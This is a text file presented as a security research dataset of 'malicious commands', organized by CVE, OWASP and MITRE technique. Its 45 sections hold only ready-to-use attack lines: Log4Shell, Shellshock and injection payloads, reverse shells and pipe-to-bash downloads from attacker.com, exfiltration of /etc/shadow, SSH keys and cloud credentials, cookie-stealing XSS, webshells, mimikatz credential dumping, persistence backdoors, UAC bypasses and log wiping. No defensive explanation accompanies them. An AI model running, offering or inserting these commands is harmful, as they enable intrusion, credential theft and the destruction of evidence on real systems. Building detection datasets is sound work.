================================================================
ADVANCED MALICIOUS COMMANDS - SECURITY RESEARCH DATASET
Sources: MITRE ATT&CK, OWASP, NVD/CVE, Exploit-DB
================================================================
================================================================
SECTION 1: LOG4SHELL - CVE-2021-44228 - CVSS 10.0 - RCE via JNDI
MITRE: T1190
================================================================
${jndi:ldap://attacker.com/exploit}
${jndi:ldap://192.168.1.100:1389/Exploit}
${jndi:rmi://attacker.com:1099/exploit}
${jndi:dns://attacker.com/exploit}
${j${::-n}di:ldap://attacker.com/exploit}
${jndi:ldap://attacker.com/${env:AWS_SECRET_ACCESS_KEY}}
${jndi:ldap://attacker.com/${env:AWS_ACCESS_KEY_ID}}
${jndi:ldap://attacker.com/${env:JAVA_HOME}}
${jndi:ldaps://attacker.com:1389/exec/Base64/Y3VybCBodHRwOi8vYXR0YWNrZXIuY29tL3NoZWxsLnNoIHwgYmFzaA==}
curl -H "X-Api-Version: ${jndi:ldap://attacker.com:1389/exploit}" https://target.com/
curl -H "User-Agent: ${jndi:ldap://attacker.com/a}" http://target.com/
curl -H "X-Forwarded-For: ${jndi:ldap://attacker.com:1389/Exploit}" http://target.com/
curl -H "Referer: ${jndi:ldap://attacker.com/exploit}" http://target.com/api/v1/users
================================================================
SECTION 2: SPRING4SHELL - CVE-2022-22965 - CVSS 9.8
MITRE: T1190
================================================================
curl -X POST "http://target.com/" -d "class.module.classLoader.URLs[0]=jar:http://attacker.com/exploit.jar!/"
curl -X POST "http://target.com/app" -d "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"
================================================================
SECTION 3: PROXYSHELL - CVE-2021-34473/34523/31207 - CVSS 9.8
Exchange Server RCE | MITRE: T1190
================================================================
curl -k "https://exchange.target.com/autodiscover/autodiscover.json?@evil.com/owa/&Email=autodiscover/autodiscover.json%3F@evil.com" -v
curl -k "https://exchange.target.com/ecp/x.js" -H "msExchLogonMailbox: NT AUTHORITY\SYSTEM"
python3 proxyshell.py --url https://exchange.target.com --email admin@target.com
================================================================
SECTION 4: SHELLSHOCK - CVE-2014-6271 - CVSS 10.0
Bash RCE via Environment Variables | MITRE: T1190
================================================================
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1" http://target.com/cgi-bin/test.cgi
curl -H "Referer: () { :;}; echo Content-Type: text/plain; echo; /bin/cat /etc/passwd" http://target.com/cgi-bin/env.cgi
curl -H "Cookie: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.100/1234 0>&1" http://target.com/cgi-bin/
curl -A "() { :; }; wget http://attacker.com/shell.sh -O /tmp/shell.sh; bash /tmp/shell.sh" http://target.com/
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
() { :;}; /bin/bash -c 'cat /etc/shadow'
================================================================
SECTION 5: HEARTBLEED - CVE-2014-0160 - CVSS 7.5
OpenSSL OOB Memory Read | MITRE: T1040
================================================================
python heartbleed.py target.com 443
nmap -p 443 --script ssl-heartbleed target.com
python3 heartbleed-poc.py -n 100 -f dump.bin target.com
nmap --script=ssl-heartbleed -p 443,8443 192.168.1.0/24
================================================================
SECTION 6: ETERNALBLUE - CVE-2017-0144 - CVSS 8.1
SMB RCE MS17-010 | MITRE: T1210
================================================================
python eternalblue.py 192.168.1.105
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.105; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.1.100; run"
python3 send_and_execute.py 192.168.1.105 /tmp/payload.exe
================================================================
SECTION 7: BLUEKEEP - CVE-2019-0708 - CVSS 9.8
RDP RCE | MITRE: T1210
================================================================
msfconsole -q -x "use exploit/windows/rdp/cve_2019_0708_bluekeep_rce; set RHOSTS 192.168.1.105; run"
nmap -p 3389 --script rdp-vuln-ms12-020 192.168.1.0/24
python bluekeep.py 192.168.1.105
================================================================
SECTION 8: DRUPALGEDDON2 - CVE-2018-7600 - CVSS 9.8
Drupal RCE | MITRE: T1190
================================================================
python3 drupalgeddon2.py http://target.com
curl "http://target.com/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id"
curl -d "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id" "http://target.com/user/register?element_parents=account/mail/%23value&ajax_form=1"
================================================================
SECTION 9: SQL INJECTION - OWASP A03:2021
MITRE: T1190 T1078
================================================================
' OR '1'='1
' OR 1=1--
' OR 1=1#
admin'--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
'; DROP TABLE users;--
'; INSERT INTO users VALUES ('hacker','hacked','admin');--
' AND 1=2 UNION SELECT 1,@@version,3--
' AND SLEEP(5)--
'; EXEC xp_cmdshell('whoami')--
'; EXEC xp_cmdshell('net user hacker Pass123! /add')--
'; EXEC xp_cmdshell('net localgroup administrators hacker /add')--
' UNION SELECT 1,load_file('/etc/passwd'),3--
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT password FROM users LIMIT 1)))--
1; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
sqlmap -u "http://target.com/login.php?id=1" --dbs --batch
sqlmap -u "http://target.com/page?id=1" --os-shell --batch
sqlmap -u "http://target.com/?id=1" --dump-all --batch
'; WAITFOR DELAY '0:0:5'--
' OR SLEEP(5)#
0' XOR(if(now()=sysdate(),sleep(5),0)) XOR'Z
' AND (SELECT SUBSTRING(username,1,1) FROM users WHERE username='admin')='a'--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>64--
================================================================
SECTION 10: COMMAND INJECTION - OWASP A03:2021
MITRE: T1059
================================================================
; cat /etc/passwd
| cat /etc/shadow
& whoami
&& id
`whoami`
$(whoami)
; ls -la /root
| nc -e /bin/sh attacker.com 4444
; wget http://attacker.com/shell.sh -O /tmp/s && chmod +x /tmp/s && /tmp/s
& curl http://attacker.com/shell.sh | bash
|| /bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1
%0a cat /etc/passwd
127.0.0.1; cat /etc/passwd
127.0.0.1 | cat /etc/shadow
127.0.0.1 && cat /etc/shadow
{cat,/etc/passwd}
c'a't /etc/shadow
1;ls${IFS}-la
$(id)>/tmp/id.txt
;id;
================================================================
SECTION 11: SERVER-SIDE REQUEST FORGERY (SSRF) - OWASP A10:2021
MITRE: T1090 T1530
================================================================
curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
curl "http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
curl "http://target.com/image?url=file:///etc/passwd"
curl "http://target.com/image?url=file:///etc/shadow"
curl "http://target.com/fetch?url=gopher://attacker.com:70/_GET%20/"
curl "http://target.com/fetch?url=http://localhost:8080/admin"
curl "http://target.com/proxy?url=http://100.100.100.200/latest/meta-data/"
curl "http://target.com/url=dict://attacker.com:1337/sent"
curl "http://target.com/fetch?url=http://[::]:22/"
curl "http://target.com/api?endpoint=http://attacker.com:8080/steal?data="
curl "http://target.com/fetch?url=http://0.0.0.0:22"
================================================================
SECTION 12: OUT-OF-BAND (OOB) EXFILTRATION
MITRE: T1048 T1041
================================================================
nslookup $(whoami).attacker.com
nslookup $(cat /etc/passwd | head -1 | base64).attacker.com
curl "http://attacker.com/?data=$(cat /etc/passwd | base64 | tr -d '\n')"
curl "http://attacker.com/oob?d=$(cat /root/.ssh/id_rsa | base64 | tr -d '\n')"
dig $(id | base64).attacker.com
curl --data @/etc/passwd http://attacker.com/collect
curl --data @/root/.ssh/id_rsa http://attacker.com/keys
wget -q -O- --post-file=/etc/shadow http://attacker.com/collect
ncat attacker.com 443 < /etc/shadow
openssl s_client -connect attacker.com:443 <<< "$(cat /etc/passwd)"
bash -c 'cat /etc/shadow | while read line; do curl -s "http://attacker.com/?l=$(echo $line | base64)"; done'
python3 -c "import urllib.request; urllib.request.urlopen('http://attacker.com/?d=' + open('/etc/passwd').read())"
================================================================
SECTION 13: XML EXTERNAL ENTITY (XXE) - OWASP A05:2021
MITRE: T1190
================================================================
curl -X POST http://target.com/api -H "Content-Type: application/xml" -d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"
curl -X POST http://target.com/api -H "Content-Type: application/xml" -d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/shadow\">]><foo>&xxe;</foo>"
curl -X POST http://target.com/api -H "Content-Type: application/xml" -d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://attacker.com/evil.dtd\">%xxe;]><foo/>"
curl -X POST http://target.com/xmlparser -d "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///proc/self/environ\">]><root>&test;</root>"
curl -X POST http://target.com/api -H "Content-Type: application/xml" -d "<?xml version=\"1.0\"?><!DOCTYPE data [<!ENTITY file SYSTEM \"file:///root/.ssh/id_rsa\">]><data><content>&file;</content></data>"
curl -X POST http://target.com/soap -H "Content-Type: text/xml" -d "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/\">]><soap:Envelope><soap:Body>&xxe;</soap:Body></soap:Envelope>"
================================================================
SECTION 14: INSECURE DESERIALIZATION - OWASP A08:2021
CVE-2015-4852 CVE-2016-0792 CVE-2017-10352 | MITRE: T1059 T1190
================================================================
java -jar ysoserial.jar CommonsCollections1 "id" | curl -X POST http://target.com/deserialize --data-binary @-
java -jar ysoserial.jar CommonsCollections6 "wget http://attacker.com/shell.sh -O /tmp/s && bash /tmp/s" | base64
java -jar ysoserial.jar URLDNS "http://attacker.com/" | curl -X POST http://target.com/api --data-binary @-
java -jar ysoserial.jar Spring1 "curl http://attacker.com/shell.sh | bash" | base64
php -r 'echo serialize(new Exception("<?php system($_GET[\"cmd\"]); ?>"));'
================================================================
SECTION 15: SERVER-SIDE TEMPLATE INJECTION (SSTI)
MITRE: T1059 T1190
================================================================
{{7*7}}
{{7*'7'}}
${7*7}
<%= 7 * 7 %>
#{7*7}
{{config}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd').read()}}
{{''.__class__.__mro__[1].__subclasses__()[396]('id', shell=True, stdout=-1).communicate()[0].strip()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{php}echo `id`;{/php}
================================================================
SECTION 16: PATH TRAVERSAL / LFI
CVE-2021-41773 CVE-2021-42013 Apache | MITRE: T1083
================================================================
curl "http://target.com/../../../etc/passwd"
curl "http://target.com/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
curl "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
curl "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
curl "http://target.com/?file=../../../etc/passwd"
curl "http://target.com/?page=../../../../etc/shadow%00"
curl "http://target.com/?include=php://filter/convert.base64-encode/resource=/etc/passwd"
curl "http://target.com/?file=php://input" -d "<?php system('id'); ?>"
curl "http://target.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg=="
curl "http://target.com/?file=/proc/self/environ"
curl "http://target.com/?file=/var/log/apache2/access.log"
curl "http://target.com/download?file=../../etc/shadow"
curl "http://target.com/?file=zip://uploads/malicious.zip%23shell.php"
================================================================
SECTION 17: CROSS-SITE SCRIPTING (XSS) - OWASP A03:2021
MITRE: T1059.007
================================================================
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>
<script>new Image().src='http://attacker.com/?c='+document.cookie</script>
<img src=x onerror="document.location='http://attacker.com/?c='+document.cookie">
<svg onload="fetch('http://attacker.com/?c='+document.cookie)">
<body onload="document.location='http://attacker.com/steal?cookie='+btoa(document.cookie)">
"><script>alert(document.domain)</script>
'><script>alert(1)</script>
<svg/onload=alert(1)>
<iframe src=javascript:alert(1)>
<details/open/ontoggle=alert(1)>
<input onfocus=alert(1) autofocus>
<math><mi//xlink:href='data:x,<script>alert(1)</script>'></math>
<video><source onerror="javascript:alert(1)">
================================================================
SECTION 18: LDAP INJECTION - OWASP A03:2021
================================================================
*)(uid=*))(|(uid=*
*)(|(password=*))
admin)(&(password=*)
*))%00
*)(|(objectClass=*)
)(cn=*))(|(cn=*
*)(|(objectClass=person
%2a%29%28%7c%28password%3d%2a%29%29
================================================================
SECTION 19: NOSQL INJECTION - OWASP A03:2021
================================================================
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"$where": "this.username == this.password"}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"$where": "sleep(5000)"}
{"$where":"function(){return true;}"}
admin' || ''=='
{"username": {"$in": ["admin", "root"]}, "password": {"$ne": ""}}
================================================================
SECTION 20: JWT ATTACKS - OWASP A02:2021
MITRE: T1528 T1550
================================================================
python3 -c "import jwt; print(jwt.encode({'admin': True, 'user': 'admin'}, '', algorithm='none'))"
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImFkbWluIjp0cnVlfQ." http://target.com/admin
hashcat -a 0 -m 16500 jwt_hash.txt /usr/share/wordlists/rockyou.txt
python3 jwt_tool.py -t http://target.com/protected -rh "Authorization: Bearer <token>" -M at
================================================================
SECTION 21: CONTAINER ESCAPE
CVE-2019-5736 runc CVE-2020-15257 containerd | MITRE: T1611 T1610
================================================================
docker run --rm -it --privileged --pid=host alpine nsenter -t 1 -m -u -i -n sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker run -v /etc:/host_etc --rm -it alpine sh -c "cat /host_etc/shadow"
docker run --rm --privileged alpine sh -c "mkdir /mnt && mount /dev/sda1 /mnt && chroot /mnt && bash"
curl --unix-socket /var/run/docker.sock http://localhost/containers/json
curl --unix-socket /var/run/docker.sock -X POST "http://localhost/containers/create" -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["/bin/sh","-c","cat /etc/shadow"],"HostConfig":{"Binds":["/:/host"]}}'
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -it docker sh
nsenter --target 1 --mount --uts --ipc --net -- /bin/bash
capsh --print
cat /proc/net/fib_trie
================================================================
SECTION 22: KUBERNETES ATTACKS
MITRE: T1613 T1610 T1530
================================================================
kubectl get secrets --all-namespaces
kubectl get secret default-token -o yaml
kubectl exec -it pod-name -- /bin/bash
kubectl run exploit --image=alpine --restart=Never --command -- /bin/sh -c "wget -O- http://attacker.com/shell.sh | sh"
curl http://kubernetes.default.svc/api/v1/secrets -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
kubectl create clusterrolebinding pwned --clusterrole=cluster-admin --serviceaccount=default:default
curl -sk https://k8s-api:6443/api/v1/pods -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)"
================================================================
SECTION 23: CLOUD METADATA ATTACKS - AWS GCP Azure
MITRE: T1552.005 T1530
================================================================
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2-Default-Role
curl http://169.254.169.254/latest/user-data
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H "Metadata-Flavor: Google"
curl -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl http://100.100.100.200/latest/meta-data/
cat ~/.aws/credentials
cat ~/.aws/config
aws sts get-caller-identity
aws s3 ls
aws s3 ls s3://target-bucket --no-sign-request
aws secretsmanager list-secrets
aws iam list-users
aws ec2 describe-instances --region us-east-1
aws lambda list-functions
aws rds describe-db-instances
================================================================
SECTION 24: LINUX PRIVILEGE ESCALATION
CVE-2021-4034 PwnKit CVE-2022-0847 Dirty Pipe | MITRE: T1068 T1548
================================================================
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root -type f 2>/dev/null
sudo -l
sudo find /etc -exec /bin/sh \;
sudo vim -c ':!/bin/sh'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo tee /etc/sudoers <<< "attacker ALL=(ALL) NOPASSWD:ALL"
python3 pwnkit.py
./dirty_pipe_exploit
chmod u+s /bin/bash && /bin/bash -p
LD_PRELOAD=/tmp/malicious.so /usr/bin/sudo whoami
pkexec /tmp/exploit
openssl passwd -1 password | awk -F: '{print "attacker:"$2":0:0:attacker:/root:/bin/bash"}' >> /etc/passwd
crontab -l | (cat; echo "* * * * * /tmp/rev.sh") | crontab -
sudoedit -s '\' $(python3 -c 'print("A"*65536)')
================================================================
SECTION 25: WINDOWS PRIVILEGE ESCALATION
CVE-2020-1472 ZeroLogon CVE-2021-34527 PrintNightmare
CVE-2021-36934 HiveNightmare CVE-2022-30190 Follina
MITRE: T1068 T1134
================================================================
whoami /priv
whoami /all
powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell -c "Add-MpPreference -ExclusionPath 'C:\'"
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1')"
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/PowerUp.ps1'); Invoke-AllChecks"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "lsadump::sam" "exit"
mimikatz.exe "lsadump::secrets" "exit"
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
python3 zerologon_tester.py DC01 192.168.1.10
python3 CVE-2021-36934.py
python3 CVE-2021-34527.py domain/user:password@192.168.1.10
================================================================
SECTION 26: ACTIVE DIRECTORY ATTACKS
MITRE: T1558 T1207 T1484
================================================================
python3 GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10
python3 GetUserSPNs.py domain/user:password -dc-ip 192.168.1.10 -request
python3 GetUserSPNs.py -request -dc-ip 192.168.1.10 domain/user -outputfile hashes.txt
bloodhound-python -u user -p password -ns 192.168.1.10 -d domain.local -c All
impacket-psexec domain/admin:password@192.168.1.10
impacket-wmiexec domain/admin:password@192.168.1.10
python3 secretsdump.py domain/user:password@dc-ip
python3 ntlmrelayx.py -tf targets.txt -smb2support
responder -I eth0 -rdw
python3 ticketer.py -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache; impacket-wmiexec -k -no-pass domain/Administrator@dc.domain.local
python3 printerbug.py domain/user:password@dc-ip attacker-ip
================================================================
SECTION 27: KERBEROASTING / AS-REP ROASTING
MITRE: T1558.003 T1558.004
================================================================
python3 GetUserSPNs.py -request -dc-ip 192.168.1.10 domain/user -outputfile kerberoast.txt
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
Rubeus.exe kerberoast /outfile:hashes.txt
Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
python3 GetNPUsers.py domain.local/ -dc-ip 192.168.1.10 -request -format hashcat -outputfile asrep.txt
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
================================================================
SECTION 28: PASS-THE-HASH / PASS-THE-TICKET
MITRE: T1550.002 T1550.003
================================================================
mimikatz.exe "sekurlsa::pth /user:Administrator /domain:. /ntlm:HASH /run:powershell.exe"
impacket-wmiexec -hashes :NTLM_HASH domain/Administrator@192.168.1.10
evil-winrm -i 192.168.1.10 -u administrator -H NTLM_HASH
crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH --sam
python3 psexec.py -hashes :NTLM_HASH Administrator@192.168.1.10
python3 getST.py -dc-ip 192.168.1.10 -spn cifs/server.domain.local -impersonate Administrator domain/user:password
================================================================
SECTION 29: CREDENTIAL DUMPING
MITRE: T1003 T1552
================================================================
procdump.exe -accepteula -ma lsass.exe lsass.dmp
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_pid> C:\lsass.dmp full
pypykatz lsa minidump lsass.dmp
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
john --format=nt hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --format=sha512crypt /etc/shadow
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt rdp://target.com
medusa -u root -P /usr/share/wordlists/rockyou.txt -h target.com -M ssh
crackmapexec smb 192.168.1.0/24 -u administrator -p Password123 --sam
evil-winrm -i target.com -u administrator -p Password123
secretsdump.py domain/user:password@target
================================================================
SECTION 30: WINDOWS LOLBINS - Living Off The Land
MITRE: T1218
================================================================
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
mshta http://attacker.com/payload.hta
wmic process call create "cmd /c powershell -enc <base64>"
bitsadmin /transfer job /download /priority high http://attacker.com/payload.exe C:\Users\Public\payload.exe
certutil -decode payload.b64 payload.exe
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe
cmstp.exe /ni /s http://attacker.com/payload.inf
installutil.exe /logfile= /LogToConsole=false /U C:\Users\Public\payload.dll
regasm.exe /u C:\Users\Public\payload.dll
msiexec /q /i http://attacker.com/payload.msi
wscript.exe C:\Users\Public\payload.vbs
cscript.exe C:\Users\Public\payload.js
pcalua.exe -a \\attacker.com\share\payload.exe
================================================================
SECTION 31: UAC BYPASS
MITRE: T1548.002
================================================================
eventvwr.exe & reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "cmd /c powershell -enc <base64>" /f
sdclt.exe & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd /c powershell -enc <base64>" /f
fodhelper.exe & reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "powershell -enc <base64>" /f
python3 uacbypass_cmstp.py --payload payload.inf
================================================================
SECTION 32: POTATO ATTACKS - Windows Privilege Escalation
MITRE: T1134
================================================================
JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net user attacker Pass123! /add" -t *
RoguePotato.exe -r 192.168.1.100 -e "cmd.exe /c net localgroup administrators attacker /add" -l 9999
SweetPotato.exe -e EfsRpc -p C:\Users\Public\shell.exe
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
================================================================
SECTION 33: PERSISTENCE MECHANISMS
MITRE: T1053 T1543 T1546 T1136
================================================================
echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" | crontab -
(crontab -l; echo "@reboot /tmp/.hidden/backdoor.sh") | crontab -
cat >> /etc/rc.local <<< "/tmp/.hidden/backdoor.sh &"
echo "attacker:x:0:0:root:/root:/bin/bash" >> /etc/passwd
ssh-keygen -t rsa -N "" -f /tmp/id_rsa && cat /tmp/id_rsa.pub >> ~/.ssh/authorized_keys
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\Public\backdoor.exe" /f
schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\backdoor.exe" /sc onlogon /ru SYSTEM
schtasks /create /tn "Updater" /tr "powershell -enc <base64_payload>" /sc minute /mo 5
================================================================
SECTION 34: DEFENSE EVASION
MITRE: T1562 T1070 T1027 T1055
================================================================
shred -zun 10 /var/log/auth.log
shred -zun 10 /var/log/syslog
shred -zun 10 /var/log/apache2/access.log
shred -zun 10 ~/.bash_history
history -c && history -w
unset HISTFILE && export HISTFILE=/dev/null
export HISTSIZE=0
echo "" > /var/log/wtmp
echo "" > /var/log/btmp
sed -i '/attacker/d' /var/log/auth.log
touch -r /etc/passwd /tmp/backdoor.sh
auditctl -e 0
systemctl stop auditd
service rsyslog stop
powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"
================================================================
SECTION 35: WEBSHELL DEPLOYMENT
MITRE: T1505.003
================================================================
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
echo '<?php eval(base64_decode($_POST["cmd"])); ?>' > /var/www/html/backdoor.php
echo '<?php @eval($_POST["c"]);?>' > /var/www/html/c.php
curl "http://target.com/shell.php?cmd=id"
curl "http://target.com/shell.php?cmd=cat /etc/shadow"
printf '<%execute request("cmd")%>' > /var/www/html/shell.asp
echo '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' > /var/www/webapps/ROOT/shell.jsp
================================================================
SECTION 36: NETWORK SCANNING AND RECON
MITRE: T1595 T1046 T1018
================================================================
nmap -sS -sV -O -A -T4 -p- 192.168.1.0/24 -oA scan_results
nmap -p 445 --script smb-enum-shares,smb-enum-users 192.168.1.0/24
nmap -p 80,443,8080,8443 --script http-title,http-headers 192.168.1.0/24
masscan -p1-65535 192.168.1.0/24 --rate=10000
nuclei -t vulnerabilities/ -u http://target.com
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -u http://target.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
nikto -h target.com
enum4linux -a 192.168.1.10
ldapsearch -x -H ldap://192.168.1.10 -b "DC=domain,DC=local"
subfinder -d target.com | httpx -silent
amass enum -d target.com
dirsearch -u http://target.com -e php,asp,aspx,jsp
================================================================
SECTION 37: DATA EXFILTRATION
MITRE: T1048 T1041 T1567
================================================================
tar czf - /etc /root/.ssh | curl -X POST http://attacker.com/collect --data-binary @-
find / -name "*.conf" -o -name "*.env" -o -name "*.key" 2>/dev/null | xargs tar czf - | curl -X POST http://attacker.com/ --data-binary @-
curl --upload-file /etc/shadow https://transfer.sh/shadow
dnscat2 --dns server=attacker.com,port=53 --secret password
openssl enc -aes-256-cbc -in /etc/shadow -k password | curl -X POST http://attacker.com/ --data-binary @-
cat /etc/passwd | base64 | tr -d '\n' | xargs -I {} curl "http://attacker.com/?d={}"
python3 -c "import smtplib; s=smtplib.SMTP('attacker.com', 25); s.sendmail('victim@target.com', 'attacker@attacker.com', open('/etc/shadow').read())"
================================================================
SECTION 38: GRAPHQL ATTACKS
MITRE: T1190
================================================================
curl -X POST http://target.com/graphql -H "Content-Type: application/json" -d '{"query":"{ __schema { types { name } } }"}'
curl -X POST http://target.com/graphql -H "Content-Type: application/json" -d '{"query":"{ users { id username password email } }"}'
curl -X POST http://target.com/graphql -d '{"query":"{ user(id: \"1 OR 1=1\") { username password } }"}'
curl -X POST http://target.com/graphql -d '{"query":"mutation { login(username: \"admin\", password: \"\") { token } }"}'
================================================================
SECTION 39: WEB CACHE POISONING
OWASP PortSwigger Research
================================================================
curl -H "X-Forwarded-Host: attacker.com" http://target.com/
curl -H "X-Forwarded-Scheme: https" -H "X-Forwarded-Host: attacker.com" http://target.com/
curl -H "X-Original-URL: /admin" http://target.com/
curl -H "X-Override-URL: /admin" http://target.com/
================================================================
SECTION 40: CORS MISCONFIGURATION
OWASP A05:2021
================================================================
curl -H "Origin: http://attacker.com" http://target.com/api/user
curl -H "Origin: null" http://target.com/api/sensitive
curl -H "Origin: http://target.com.attacker.com" http://target.com/api/user
curl -H "Origin: http://attacker.com" -H "Cookie: session=victim_session" http://target.com/api/profile
================================================================
SECTION 41: HOST HEADER INJECTION
OWASP A05:2021
================================================================
curl -H "Host: attacker.com" http://target.com/
curl -H "Host: target.com" -H "X-Forwarded-Host: attacker.com" http://target.com/
curl -H "Host: localhost" http://target.com/admin
curl -H "Host: 169.254.169.254" http://target.com/
================================================================
SECTION 42: PROTOTYPE POLLUTION
MITRE: T1059.007
================================================================
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
?__proto__[admin]=true
?constructor[prototype][admin]=true
{"__proto__":{"polluted":"yes"}}
================================================================
SECTION 43: OAUTH AND SAML ATTACKS
OWASP A01:2021
================================================================
curl "http://target.com/oauth/authorize?response_type=code&client_id=evil&redirect_uri=http://attacker.com/callback"
curl "http://target.com/oauth/token" -d "grant_type=authorization_code&code=STOLEN_CODE&redirect_uri=http://attacker.com/callback&client_id=evil"
curl -H "Authorization: Bearer <other_user_token>" http://target.com/api/me
python3 saml_bypass.py --endpoint http://target.com/saml/acs --assertion malicious_assertion.xml
================================================================
SECTION 44: MASS ASSIGNMENT ATTACKS
OWASP A08:2021
================================================================
curl -X PUT http://target.com/api/user/1 -d '{"username":"user","role":"admin","isAdmin":true}'
curl -X POST http://target.com/register -d '{"username":"attacker","password":"pass","role":"admin"}'
curl -X PATCH http://target.com/api/profile -d '{"email":"user@test.com","isAdmin":true,"balance":999999}'
================================================================
SECTION 45: 2FA BYPASS TECHNIQUES
OWASP A07:2021
================================================================
curl http://target.com/api/2fa/verify -d '{"code":"000000"}'
curl http://target.com/api/2fa/verify -d '{"code":""}'
curl http://target.com/dashboard -H "Cookie: session=valid_pre_2fa_session"
curl http://target.com/api/2fa/verify -d '{"code":"123456"}' -H "X-Forwarded-For: 127.0.0.1"
================================================================
